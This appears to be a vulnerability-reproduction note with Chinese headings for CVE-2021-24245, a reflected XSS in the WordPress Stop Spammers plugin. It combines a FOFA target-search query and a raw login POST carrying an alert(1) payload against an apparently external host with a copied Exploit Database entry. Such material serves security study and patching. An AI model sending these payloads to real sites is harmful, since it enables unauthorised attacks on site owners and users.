一.漏洞复现)
fofa搜索:"WordPress"
POST /wordpress/wp-login.php HTTP/1.1
Host: hgnw.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://hgnw.dev/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: https://hgnw.dev
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&redirect_to=https%3A%2F%2Fhgnw.dev%2Fwordpress%2Fwp-admin%2F&testcookie=1
二.漏洞exploit)
Exploit Database
EXPLOIT DATABASE
EXPLOITS
GHDB
PAPERS
SHELLCODES
SEARCH EDB
SEARCHSPLOIT MANUAL
SUBMISSIONS
ONLINE TRAINING
Exploit Database
WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
EDB-ID:
49880
CVE:
2021-24245
EDB Verified:
Author:
HOSEIN VITA
Type:
WEBAPPS
Exploit: /
Platform:
PHP
Date:
2021-05-19
Vulnerable App:
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245
Summary:
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
Proof of concepts:
1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X οnclick=alert(1) "
#Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss
#Tested on Firefox
Request POC:
POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1